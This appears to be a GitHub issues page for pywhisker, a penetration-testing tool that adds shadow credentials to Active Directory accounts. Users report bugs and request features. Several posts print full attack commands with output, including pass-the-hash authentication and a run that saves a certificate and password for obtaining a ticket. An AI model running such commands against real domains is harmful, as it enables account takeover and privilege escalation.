shutdownrepo / pywhisker Goto Github PK

I get "unsupported hash type md4" when trying to add new value:

It would be awesome to have pipx support for this useful package so it's even easier to deal with python virtual envs. To make it work the setup.py or pyproject.toml file is needed as per docs https://pipx.pypa.io/latest/how-pipx-works/.

While on an engagement I was not able to get a computer account to add shadow credentials to itself. Was this fixed by Microsoft?

pywhisker -t 'vm-dc02$' -a add -d domain.local -u 'VM-DC02$' -H BAB0BB5F7A058A24AE91003A0B80DFDD --dc-ip 192.168.0.100   
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: ec2f3908-666b-5f5f-c2bf-0fa4cfe41c6f
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514B3, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

However I was able to add shadow credentials as the domain admin:

pywhisker -t 'vm-dc02$' -a add -d domain.local -u Administrator -p 'S3cr3tp4ssw0rd' --dc-ip 192.168.0.100
[*] Searching for the target account
[*] Target user found: CN=VM-DC02,OU=Domain Controllers,DC=domain,DC=local
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 21f07708-fffa-26d0-02b0-03c397165d69
[*] Updating the msDS-KeyCredentialLink attribute of vm-dc02$
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: diJE4LLY.pfx
[*] Must be used with password: tHlLzQkOY2jHGFzauf3Y
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

I also checked for any existing shadow credentials for the targeted computer account but there weren't any.

Hi. Thank you very much for your time writing this tool!

I can successfully add shadow credentials when authenticating using a plaintext password but when I try the same using Kerberos authentication on the same machine in the same "session" it fails with "invalid server address". I have tested all kind of variations of the parameters such as "-d [domain]" and "--dc-ip [DC IP]" in various locations of the command but I always get the same error. Note that I have no issues using for example Impacket's secretsdump script with Kerberos in the same environment.

I also noted that you have not used the "-k" parameter in any of your examples here so I cannot check my command against an example.

Thank you for this great Python port! The README has not been updated to include the --action spray. I swore that the tool supported it, but couldn't find it until I read the PRs: #6

This addition would help others realize faster that this tool supports this great feature like the C# ShadowSpray tool.

https://pbs.twimg.com/media/FiV43yLWQAQdvnV.jpg

Hi,

Thank you for this tool.

During testing of the new cross-domain shadow credential writing I encountered an issue. As you can see in the pictures, adlab.local\adlab_shadow1 has full control of child.adlab.local\child_domainuser1 but still the writing of shadow credentials fails due to insufficient rights. I have no issues writing shadow credentials within a domain.

The trust involved is a parent-child trust where adlab.local is the parent domain and child.adlab.local is the child domain.

When i need generate certificate from domainA.contoso.local to target victimuser in domainB.contoso.local. For authentication i use NT hash with this command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -H :<nthash> -t victimuser -td domainB.contoso.local
All fine.
But in my case domainB ldap signing +channel binding is enabled, and i can't auth with ntlm, because i get error strongerAuthRequired.
And when i ask ticket for [email protected] and then use command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -k --dc-ip <dc ip domainB.contoso.local> -t victimuser -td domainB.contoso.local
I get error KDC_ERR_WRONG_REALM
I know that this version of ldap3 can solve this problem https://github.com/ThePirateWhoSmellsOfSunflowers/ldap3/tree/tls_cb_and_seal_for_ntlm.
I tried to do it myself, but I couldn't succeed.